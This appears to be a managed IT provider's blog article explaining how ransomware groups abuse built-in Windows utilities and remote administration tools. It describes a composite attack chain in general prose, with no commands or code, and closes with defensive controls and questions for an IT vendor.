Living-Off-the-Land Attacks: How Ransomware Groups Turn Your Own IT Tools Against You

Ransomware groups have stopped smuggling in exotic malware. Instead, they move through your network using tools that were already there when they arrived – remote administration software, scripting engines, built-in Windows utilities – because those tools blend in, generate minimal alerts, and are trusted by the very security controls designed to stop outside threats. Data from CISA advisories published in 2024 and 2025, combined with Sophos incident response reporting, makes one thing clear: living-off-the-land attacks are now the dominant ransomware technique, and conventional defenses routinely miss them.

1. What Living-Off-the-Land Actually Means
2. The Specific Tools Ransomware Groups Are Abusing
3. What 2024 and 2025 CISA Advisories and Sophos Data Reveal
4. Who Is Most at Risk
5. Real Attack Chains: How the Sequence Unfolds
6. The Defense Posture That Actually Works Against Living-Off-the-Land Attacks
7. What to Ask Your IT Firm Right Now

What Living-Off-the-Land Actually Means

The phrase comes from military and survival contexts – sustaining yourself entirely from resources already in the environment, rather than importing supplies. In cybersecurity, living-off-the-land attacks describe adversaries who do exactly that: they gain initial access, then conduct their entire operation using software and utilities that were already present before they arrived.

This is not a niche or emerging technique. The NSA, CISA, FBI, and their counterparts in the UK, Canada, Australia, and New Zealand issued a joint advisory in May 2023 – updated and referenced repeatedly in 2024 guidance – specifically warning that state-sponsored and financially motivated threat actors have converged on living-off-the-land attacks as their preferred method. The reason is simple: it works, and it is hard to detect.

When a security tool sees PowerShell running or a remote desktop session being initiated, it does not automatically flag the activity as malicious. Those actions happen dozens or hundreds of times a day in a healthy IT environment. The attacker’s job is to make malicious commands look like routine administration – and in many small business networks, they succeed for weeks before anyone notices.

The Specific Tools Ransomware Groups Are Abusing

Every tool on this list is likely present in your environment right now. Each one has been documented in CISA advisories or Sophos incident response cases as a vehicle for ransomware staging and deployment.

Windows Built-In Utilities

• PowerShell – Used to download second-stage payloads, disable Windows Defender, enumerate users and network shares, and execute encrypted command strings that evade signature-based detection. CISA’s 2024 advisory on Black Basta ransomware called out PowerShell abuse as a primary staging mechanism.
• Windows Management Instrumentation (WMI) – Allows attackers to execute commands on remote systems without dropping files to disk. Because WMI is a core Windows component, most businesses do not restrict it or monitor it for anomalous use.
• Remote Desktop Protocol (RDP) – Legitimately used by IT teams for remote access. Ransomware groups routinely exploit exposed or weakly authenticated RDP ports as the initial entry point, then use valid credentials to move between machines.
• Task Scheduler – Used to establish persistence and trigger encryption payloads at a specific time, often overnight or on a weekend when monitoring is lightest.
• certutil.exe and bitsadmin.exe – Both are Windows command-line utilities used to download files. Attackers use them to pull ransomware components from remote servers because the traffic appears to originate from a trusted Windows process.

Legitimate Third-Party IT Administration Tools

• PsExec – A free Sysinternals tool used by IT professionals to run processes on remote systems. It is a staple of lateral movement in ransomware incidents. CISA’s advisory on Akira ransomware, published in April 2024, listed PsExec as a key lateral movement mechanism.
• AnyDesk, TeamViewer, and ScreenConnect – Remote support tools that many small businesses have installed. Sophos incident response data from 2024 found that attackers used legitimate remote access software in over 80 percent of ransomware cases they investigated – not malware, but the same tools your IT vendor uses to fix a printer remotely.
• Advanced IP Scanner and SoftPerfect Network Scanner – Free network discovery tools used by IT teams for legitimate inventory purposes. Also widely used by ransomware affiliates to map a target network in the first hours after gaining access.
• Cobalt Strike – Originally a commercial penetration testing framework, cracked versions are now available on underground markets. CISA advisories on LockBit, BlackCat (ALPHV), and Royal ransomware all documented its use in small business environments.

What 2024 and 2025 CISA Advisories and Sophos Data Reveal

The volume and specificity of public threat intelligence available in 2024 and 2025 is unprecedented. CISA has moved from general guidance to publishing detailed technical advisories for specific ransomware groups, complete with the exact tools, techniques, and procedures those groups use. The picture that emerges is consistent across groups and across victim sizes.

The CISA StopRansomware portal published advisories on at least a dozen major ransomware families in 2024 alone, including Akira, Black Basta, LockBit 3.0, Medusa, Play, and Rhysida. Every single advisory documented living-off-the-land attacks as a core component of the attack chain. This is not incidental – it is the method.

Sophos’s 2025 Active Adversary Report, drawn from their incident response cases, added quantitative weight to what CISA advisories describe qualitatively. Among the most significant findings:

• The median dwell time – the window between initial breach and ransomware deployment – dropped to under five days for ransomware cases in 2024. Attackers are moving faster than most small businesses can detect them, even when detection tooling is in place.
• RDP was the most commonly abused entry point, present in more than 90 percent of cases where the initial access vector was identified.
• Legitimate remote access tools were used in the overwhelming majority of cases – not as the initial breach mechanism, but as the persistence and lateral movement mechanism once inside.
• Attackers disabled or uninstalled security software in a significant portion of cases, often using the same administrative privileges and tools that an IT team would use to manage those products.

The FBI’s Internet Crime Complaint Center 2023 annual report recorded over $59 million in adjusted losses from ransomware complaints – and that figure represents only incidents that were reported to the FBI. The actual economic impact across small businesses is widely understood to be a significant multiple of that number.

Who Is Most at Risk

There is a persistent and dangerous assumption in small business communities that ransomware groups target large enterprises because that is where the money is. That assumption has not been accurate for several years.

Large enterprises invest heavily in detection and response capabilities. Small businesses – particularly those in the 10-to-150 employee range – often have the same IT administration tools installed, the same exposure surface, and dramatically less monitoring capability. For ransomware affiliates working on a volume model, that math is favorable.

The industries appearing most frequently in CISA advisories and Sophos incident data are not surprising: healthcare, professional services (including legal and accounting firms), manufacturing, and financial services. But the more honest framing is this: any business that has not restricted administrative tool usage, has RDP exposed without multi-factor authentication, or relies on a single layer of endpoint protection is in the target population – regardless of industry.

Businesses that have outsourced their IT to a vendor who installed remote administration tools but never restricted or monitored them face a specific risk: the attacker’s footprint looks identical to the IT vendor’s footprint. Without behavioral monitoring and access controls, there is no reliable way to tell the difference – and that is precisely why living-off-the-land attacks are so effective against outsourced IT environments.

Real Attack Chains: How the Sequence Unfolds

The following chain reflects documented techniques from multiple 2024 CISA advisories. It is composite – no specific organizations are identified – but every step in it has been observed in real incidents.

Phase 1 – Initial Access (Hours 0 to 2)

• An attacker purchases valid credentials for an RDP-exposed server from a dark web credential market – a commodity market that has grown substantially since 2022.
• They authenticate using legitimate credentials. No malware has been introduced. No alerts fire.
• They run Advanced IP Scanner to map the network, identifying servers, shared drives, and backup infrastructure.

Phase 2 – Lateral Movement (Hours 2 to 72)

• Using PsExec, the attacker pushes a small script to additional workstations, establishing footholds across multiple machines simultaneously.
• PowerShell commands enumerate Active Directory users and groups, identify the highest-privilege accounts, and locate backup servers.
• AnyDesk or a similar remote access tool is installed silently on several systems, creating persistent access that survives a password reset on the originally compromised account.

Phase 3 – Pre-Deployment Preparation (Hours 72 to 120)

• Backup systems are identified and deleted, corrupted, or encrypted first – ensuring recovery is impossible or prohibitively expensive without paying the ransom.
• Windows Defender and any installed endpoint protection are disabled using legitimate administrative commands.
• Sensitive data – financial records, client files, employee data – is exfiltrated to attacker-controlled cloud storage for use in double-extortion demands.

Phase 4 – Encryption (Typically a Weekend Night)

• A scheduled task fires at 2:00 AM on a Saturday.
• The ransomware payload executes across every reachable system simultaneously.
• By Monday morning, the business cannot open files, access email, or reach its own data. The ransom note is on every desktop.

The entire operation – from initial access to Monday morning’s ransom note – was conducted almost entirely using tools that were already inside the network when the attacker arrived. The weapon is the environment itself.

The Defense Posture That Actually Works Against Living-Off-the-Land Attacks

Defending against living-off-the-land attacks requires a different mental model than traditional perimeter security. The question is not “can we keep attackers out?” but “if an attacker is already inside using legitimate tools, what stops them?” The answer is several overlapping controls – none of which works in isolation.

Restrict What Legitimate Tools Can Do

• PowerShell should run in Constrained Language Mode for all users who do not require full scripting access. Script block logging should be enabled on every endpoint.
• RDP should not be exposed directly to the internet under any circumstances. Access should require a virtual private network layer and multi-factor authentication before an RDP session is even possible.
• Administrative tools like PsExec should be explicitly allowlisted – only named accounts with a documented business need can run them, and any execution by an unlisted account triggers an alert.
• Remote access software installed by an IT vendor should be inventoried, access-controlled, and monitored. A remote session initiated outside of business hours or from an unfamiliar location should generate an alert within minutes.

Separate Backup Infrastructure

• Backups must be stored in a location that is not accessible via the same credentials used to administer production systems. Immutable backup storage – where data cannot be deleted or modified even by an administrator – is the standard that incident-hardened environments use.
• Recovery from backup should be tested regularly. A backup that has never been tested is an assumption, not a capability.

Behavioral Monitoring

• Signature-based endpoint protection does not catch living-off-the-land attacks because the tools being used are not malware – they are trusted software. Behavioral monitoring, which watches for anomalous sequences of activity (a user account running PsExec on fifteen machines in three minutes, for example), is the detection layer that matters here.
• Collecting logs from endpoints, servers, and network infrastructure into a single platform and running automated detections against them is no longer optional for businesses with meaningful data to protect.

Least Privilege, Enforced Rigorously

• Most ransomware lateral movement depends on accounts with excessive privileges – typically domain administrator credentials that have been reused, shared, or poorly protected. A rigorous least-privilege model limits what any single compromised account can reach.
• Multi-factor authentication on every administrative account is the single highest-value control in the current threat landscape. CISA has stated this explicitly in multiple advisories. It is non-negotiable.

For a deeper look at how we approach layered cybersecurity for small and mid-size businesses – including behavioral monitoring, managed detection and response, and backup architecture – see our cybersecurity services overview and our managed IT services page.

What to Ask Your IT Firm Right Now

If you are the executive who owns your organization’s technology risk, these questions belong on your agenda with your current IT provider. The answers will tell you more about your actual exposure to living-off-the-land attacks than any marketing language will.

• Which remote administration tools are installed across our environment, and which accounts are authorized to use them? Can you show me that list?
• Is RDP exposed directly to the internet on any of our systems? If so, what is the remediation plan and timeline?
• Do we have multi-factor authentication enforced on every administrative account – including the accounts your team uses to manage our systems?
• How would you detect if someone used PsExec or PowerShell in an unusual pattern inside our network at 2:00 AM? What would fire an alert, and who would see it?
• Where are our backups stored, and can an attacker who has compromised our domain administrator account delete or encrypt them?
• Have you ever tested recovery from a full backup restoration? When was the last time, and how long did it take?
• If a ransomware group spent 72 hours moving through our network using only tools we already have installed, what in our current setup would catch that before encryption?

An IT firm that cannot answer these questions specifically and confidently has likely not built the layered, behaviorally aware environment the current threat landscape demands. Living-off-the-land attacks succeed not because businesses lack security tools, but because the security architecture was never built with the assumption that attackers would use the IT team’s own toolbox against them.

That assumption needs to change before the ransom note appears on Monday morning. If you want to know where your environment actually stands, Book a Free Cybersecurity Strategy Call – it’s a 20-minute conversation with our team, no obligation.